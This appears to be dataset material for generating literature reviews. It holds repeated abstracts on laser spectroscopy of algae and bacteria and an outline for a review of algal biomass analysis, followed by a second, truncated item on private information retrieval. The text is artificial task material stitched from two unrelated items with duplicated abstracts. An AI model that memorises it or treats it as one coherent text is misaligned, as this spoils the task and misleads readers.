algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Chemometric prediction of alginate monomer composition: A comparative spectroscopic study using IR, Raman, NIR and NMR paper_content: Abstract The potential of using infrared (IR), Raman and near infrared (NIR) spectroscopy combined with chemometrics for reliable and rapid determination of the ratio of mannuronic and guluronic acid (M/G ratio) in commercial sodium alginate powders has been investigated. The reference method for quantification of the M/G ratio was solution-state 1 H nuclear magnetic resonance (NMR) spectroscopy. For a set of 100 commercial alginate powders with a M/G ratio range of 0.5–2.1 quantitative calibrations using partial least squares regression (PLSR) were developed and compared for the three spectroscopic methods. All three spectroscopic methods yielded models with prediction errors (RMSEP) of 0.08 and correlation coefficients between 0.96 and 0.97. However, the model based on extended inverted signal corrected (EISC) Raman spectra stood out by only using one PLS component for the prediction. The results are comparable to that of the experimental error of the reference method estimated to be between 0.01 and 0.08. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: Comparison of green algae Cladophora sp. and Enteromorpha sp. as potential biomonitors of chemical elements in the southern Baltic. paper_content: The contents of Cd, Cu, Ni, Pb, Zn, Mn, K, Na, Ca and Mg were determined in the green algae Cladophora sp. from coastal and lagoonal waters of the southern Baltic. Factor analysis demonstrated spatial differences between concentration of chemical elements. The algae from the southern Baltic contained more Na and K while the anthropogenic impact of Cu, Pb and Zn was observed in the case of Cladophora sp. and Enteromorpha sp. from the Gulf of Gdansk at the vicinity of Gdynia. This area is exposed to emission of heavy metals from municipal and industrial sources with the main contribution of shipbuilding industry and seaport. The statistical evaluation of data has demonstrated that there exists a correlation between concentrations of Cu, Pb and Zn in both green algae collected at the same time and sampling sites of the Gulf of Gdansk. Our results show that in the case of absence of one species in the investigated area it is still possible to continue successfully the biomonitoring studies with its replacing by second one, i.e. Cladophora sp. by Enteromorpha sp. and vice versa; in consequence reliable results may be obtained. --- paper_title: INTERCOLONIAL VARIABILITY IN MACROMOLECULAR COMPOSITION IN P-STARVED AND P-REPLETE SCENEDESMUS POPULATIONS REVEALED BY INFRARED MICROSPECTROSCOPY(1). paper_content: Macromolecular variability in microalgal populations subject to different nutrient environments was investigated, using the chlorophyte alga Scenedesmus quadricauda (Turpin) Bréb. as a model organism. The large size of the four-cell coenobia in the strain used in this study (∼35 μm diameter) conveniently allowed high quality spectra to be obtained from individual coenobia using a laboratory-based Fourier transform infrared (FTIR) microscope with a conventional globar source of IR. By drawing sizable subpopulations of coenobia from two Scenedesmus cultures grown under either nutrient-replete or P-starved conditions, the population variability in macromolecular composition, and the effects of nutrient change upon this, could be estimated. On average, P-starved coenobia had higher carbohydrate and lower protein absorbance compared with P-replete coenobia. These parameters varied between coenobia with histograms of the ratio of absorbance of the largest protein and carbohydrate bands being Gaussian distributed. Distributions for the P-replete and P-starved subpopulations were nonoverlapping, with the difference in mean ratios for the two populations being statistically significant. Greater variance was observed in the P-starved subpopulation. In addition, multivariate models were developed using the spectral data, which could accurately predict the nutrient status of an independent individual coenobium, based on its FTIR spectrum. Partial least squares discriminant analysis (PLS-DA) was a better prediction method compared with soft independent modeling by class analogy (SIMCA). --- paper_title: Femtosecond time-resolved laser-induced breakdown spectroscopy for detection and identification of bacteria: A comparison to the nanosecond regime paper_content: Bacterial samples (Escherichia coli and Bacillus subtilis) have been analyzed by laser-induced breakdown spectroscopy (LIBS) using femtosecond pulses. We compare the obtained spectra with those resulting from the classical nanosecond LIBS. Specific features of femtosecond LIBS have been demonstrated, very attractive for analyzing biological sample: (i) a lower plasma temperature leading to negligible nitrogen and oxygen emissions from excited ambient air and a better contrast in detection of trace mineral species; and (ii) a specific ablation regime that favors intramolecular bonds emission with respect to atomic emission. A precise kinetic study of molecular band head intensities allows distinguishing the contribution of native CN bonds released by the sample from that due to carbon recombination with atmospheric nitrogen. Furthermore a sensitive detection of trace mineral elements provide specific spectral signature of different bacteria. An example is given for the Gram test provided by different magne... --- paper_title: Feasibility of Spectroscopic Characterization of Algal Lipids: Chemometric Correlation of NIR and FTIR Spectra with Exogenous Lipids in Algal Biomass paper_content: A large number of algal biofuels projects rely on a lipid screening technique for selecting a particular algal strain with which to work. We have developed a multivariate calibration model for predicting the levels of spiked neutral and polar lipids in microalgae, based on infrared (both near-infrared (NIR) and Fourier transform infrared (FTIR)) spectroscopy. The advantage of an infrared spectroscopic technique over traditional chemical methods is the direct, fast, and non-destructive nature of the screening method. This calibration model provides a fast and high-throughput method for determining lipid content, providing an alternative to laborious traditional wet chemical methods. We present data of a study based on nine levels of exogenous lipid spikes (between 1% and 3% (w/w)) of trilaurin as a triglyceride and phosphatidylcholine as a phospholipid model compound in lyophilized algal biomass. We used a chemometric approach to corrrelate the main spectral changes upon increasing phospholipid and triglyceride content in algal biomass collected from single species. A multivariate partial least squares (PLS) calibration model was built and improved upon with the addition of multiple species to the dataset. Our results show that NIR and FTIR spectra of biomass from four species can be used to accurately predict the levels of exogenously added lipids. It appears that the cross-species verification of the predictions is more accurate with the NIR models (R 2 = 0.969 and 0.951 and RMECV = 0.182 and 0.227% for trilaurin and phosphatidylcholine spike respectively), compared with FTIR (R 2 = 0.907 and 0.464 and RMECV = 0.302 and 0.767% for trilaurin and phosphatidylcholine spike, respectively). A fast high-throughput spectroscopic lipid fingerprinting method can be applied in a multitude of screening efforts that are ongoing in the microalgal research community. --- paper_title: The Use of Laser-Induced Breakdown Spectroscopy for Distinguishing between Bacterial Pathogen Species and Strains paper_content: Laser-induced breakdown spectroscopy (LIBS) was used in a blind study to successfully differentiate bacterial pathogens, both species and strain. The pathogens used for the study were chosen and prepared by one set of researchers. The LIBS data were collected and analyzed by another set of researchers. The latter researchers had no knowledge of the sample identities other than that (1) the first five of fifteen samples were unique (not replicates) and (2) the remaining ten samples consisted of two replicates of each of the first five samples. Using only chemometric analysis of the LIBS data, the ten replicate bacterial samples were successfully matched to each of the first five samples. The results of this blind study show it is possible to differentiate the bacterial pathogens Escherichia coli, three clonal methicillin-resistant Staphylococcus aureus (MRSA) strains, and one unrelated MRSA strain using LIBS. This is an important finding because it demonstrates that LIBS can be used to determine bacterial pathogen species within a defined sample set and can be used to differentiate between clonal relationships among strains of a single multiple-antibiotic-resistant bacterial species. Such a capability is important for the development of LIBS instruments for use in medical, water, and food safety applications. --- paper_title: A membrane basis for bacterial identification and discrimination using laser-induced breakdown spectroscopy paper_content: Nanosecond single-pulse laser-induced breakdown spectroscopy (LIBS) has been used to discriminate between two different genera of Gram-negative bacteria and between several strains of the Escherichia coli bacterium based on the relative concentration of trace inorganic elements in the bacteria. Of particular importance in all such studies to date has been the role of divalent cations, specifically Ca2+ and Mg2+, which are present in the membranes of Gram-negative bacteria and act to aggregate the highly polar lipopolysaccharide molecules. We have demonstrated that the source of emission from Ca and Mg atoms observed in LIBS plasmas from bacteria is at least partially located at the outer membrane by intentionally altering membrane biochemistry and correlating these changes with the observed changes in the LIBS spectra. The definitive assignment of some fraction of the LIBS emission to the outer membrane composition establishes a potential serological, or surface-antigen, basis for the laser-based identifi... --- paper_title: Spectral fingerprints of bacterial strains by laser-induced breakdown spectroscopy paper_content: Laser-induced breakdown spectroscopy (LIBS) is used to record the plasma emission for the colonies of vegetative cells or spores of five bacterial strains: Bacillus thuringiensis T34, Escherichia coli IHII/pHT315, Bacillus subtilis 168, Bacillus megaterium QM B1551, and Bacillus megaterium PV361. The major inorganic components of the bacterial samples, including Ca, Mn, K, Na, Fe, and phosphate, are clearly identified from the breakdown emission spectra. The bacterial spores accumulate a lot of calcium that shows strong LIBS emission at 393.7 and 396.9 nm. The diverse emissions from the phosphate component at 588.1 and 588.7 nm provide a fingerprint for bacterial strains. The relative change of inclusions in the bacteria is clearly distinguished by two-dimensional charts of the bacterial components. The results demonstrate the potential of the LIBS method for the rapid and low false-positive classification of bacteria with minimum sample preparation. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. the influence of environmental exposure and other cultivation and biological factors having an impact on them. Algae cells were suspended in liquid media or presented in a form of adherent cell mass on a surface (biofilm) and, consequently, characterized using their spectra. In our feasibility study we used three different experimental arrangements employing double-pulse LIBS technique in order to improve on analytical selectivity and sensitivity for potential industrial biotechnology applications, e.g. for monitoring of mass production of commercial biofuels, utilization in the food industry and control of the removal of heavy metal ions from industrial waste waters. --- paper_title: The Use of Laser-Induced Breakdown Spectroscopy for Distinguishing between Bacterial Pathogen Species and Strains paper_content: Laser-induced breakdown spectroscopy (LIBS) was used in a blind study to successfully differentiate bacterial pathogens, both species and strain. The pathogens used for the study were chosen and prepared by one set of researchers. The LIBS data were collected and analyzed by another set of researchers. The latter researchers had no knowledge of the sample identities other than that (1) the first five of fifteen samples were unique (not replicates) and (2) the remaining ten samples consisted of two replicates of each of the first five samples. Using only chemometric analysis of the LIBS data, the ten replicate bacterial samples were successfully matched to each of the first five samples. The results of this blind study show it is possible to differentiate the bacterial pathogens Escherichia coli, three clonal methicillin-resistant Staphylococcus aureus (MRSA) strains, and one unrelated MRSA strain using LIBS. This is an important finding because it demonstrates that LIBS can be used to determine bacterial pathogen species within a defined sample set and can be used to differentiate between clonal relationships among strains of a single multiple-antibiotic-resistant bacterial species. Such a capability is important for the development of LIBS instruments for use in medical, water, and food safety applications. ---
Title: Algal Biomass Analysis by Laser-Based Analytical Techniques—A Review Section 1: Introduction Description 1: Provide an overview of the importance of algal biomass as an alternative energy source and its potential in various applications, including biofuels, bioremediation, and industrial uses. Highlight the challenges and opportunities in algal biomass research. Section 2: Laser-Induced Breakdown Spectroscopy Description 2: Detail the principles, advantages, and applications of LIBS for elemental analysis of algal samples. Discuss the specific challenges and methodologies for improving LIBS sensitivity and accuracy. Section 3: Laser-Induced Breakdown Spectroscopy of Liquid Samples Description 3: Explain the techniques and approaches for conducting LIBS on liquid samples, particularly algal suspensions. Highlight the recent developments and improvements in this area. Section 4: Laser-Induced Breakdown Spectroscopy for Molecular Analysis Description 4: Discuss the capability of LIBS to detect molecular bands in plasma emissions, the applications of this technique, and the potential of combining LIBS with other spectroscopic methods for more comprehensive analyses. Section 5: Laser Ablation Inductively Coupled Plasma Based Techniques Description 5: Describe the use of LA-ICP-MS and LA-ICP-OES for algal biomass analysis, emphasizing the advantages, procedures, and specific applications in spatially-resolved elemental analysis. Section 6: Raman Spectroscopy Description 6: Provide an overview of Raman spectroscopy, its principles, applications, and the specific benefits of this technique for analyzing the biochemical composition and lipid content of algal cells. Mention the integration with optical tweezers for non-destructive in vivo analysis. Section 7: Chemometrics for the Recognition of Algal Strains Description 7: Introduce the role of chemometric algorithms in analyzing spectroscopic data from algal samples. Explain how these algorithms are used for qualitative and quantitative analysis and classification of algal strains. Section 8: Discrimination of Four Algal Strains by LIBS Description 8: Present a case study on using LIBS combined with chemometric algorithms to discriminate between different algal strains. Describe the methodology, results, and implications of this research. Section 9: Conclusions and Future Prospects Description 9: Summarize the key findings of the review, emphasizing the potential and limitations of laser-based techniques for algal biomass analysis. Discuss future research directions and technological advancements needed to overcome current challenges.
A survey of single-database private information retrieval: techniques and applications
20
--- paper_title: Searchable symmetric encryption: Improved definitions and efficient constructions paper_content: Searchable symmetric encryption SSE allows a party to outsource the storage of his data to another party in a private manner, while maintaining the ability to selectively search over it. This problem has been the focus of active research and several security definitions and constructions have been proposed. In this paper we begin by reviewing existing notions of security and propose new and stronger security definitions. We then present two constructions that we show secure under our new definitions. Interestingly, in addition to satisfying stronger security guarantees, our constructions are more efficient than all previous constructions.Further, prior work on SSE only considered the setting where only the owner of the data is capable of submitting search queries. We consider the natural extension where an arbitrary group of parties other than the owner can submit search queries. We formally define SSE in this multi-user setting, and present an efficient construction. --- paper_title: Software protection and simulation on oblivious RAMs paper_content: Software protection is one of the most important issues concerning computer practice. There exist many heuristics and ad-hoc methods for protection, but the problem as a whole has not received the theoretical treatment it deserves. In this paper, we provide theoretical treatment of software protection. We reduce the problem of software protection to the problem of efficient simulation on oblivious RAM. A machine is oblivious if thhe sequence in which it accesses memory locations is equivalent for any two inputs with the same running time. For example, an oblivious Turing Machine is one for which the movement of the heads on the tapes is identical for each computation. (Thus, the movement is independent of the actual input.) What is the slowdown in the running time of a machine, if it is required to be oblivious? In 1979, Pippenger and Fischer showed how a two-tape oblivious Turing Machine can simulate, on-line, a one-tape Turing Machine, with a logarithmic slowdown in the running time. We show an analogous result for the random-access machine (RAM) model of computation. In particular, we show how to do an on-line simulation of an arbitrary RAM by a probabilistic oblivious RAM with a polylogaithmic slowdown in the running time. On the other hand, we show that a logarithmic slowdown is a lower bound. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: Single-Database Private Information Retrieval with Constant Communication Rate paper_content: We present a single-database private information retrieval (PIR) scheme with communication complexity ${\mathcal O}(k+d)$, where k ≥ log n is a security parameter that depends on the database size n and d is the bit-length of the retrieved database block. This communication complexity is better asymptotically than previous single-database PIR schemes. The scheme also gives improved performance for practical parameter settings whether the user is retrieving a single bit or very large blocks. For large blocks, our scheme achieves a constant “rate” (e.g., 0.2), even when the user-side communication is very low (e.g., two 1024-bit numbers). Our scheme and security analysis is presented using general groups with hidden smooth subgroups; the scheme can be instantiated using composite moduli, in which case the security of our scheme is based on a simple variant of the “Φ-hiding” assumption by Cachin, Micali and Stadler [2]. --- paper_title: Private information retrieval paper_content: We describe schemes that enable a user to access k replicated copies of a database (k/spl ges/2) and privately retrieve information stored in the database. This means that each individual database gets no information on the identity of the item retrieved by the user. For a single database, achieving this type of privacy requires communicating the whole database, or n bits (where n is the number of bits in the database). Our schemes use the replication to gain substantial saving. In particular, we have: A two database scheme with communication complexity of O(n/sup 1/3/). A scheme for a constant number, k, of databases with communication complexity O(n/sup 1/k/). A scheme for 1/3 log/sub 2/ n databases with polylogarithmic (in n) communication complexity. --- paper_title: A Generalisation, a Simplification and some Applications of Paillier’s Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits. --- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(klog2n+llogn), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying 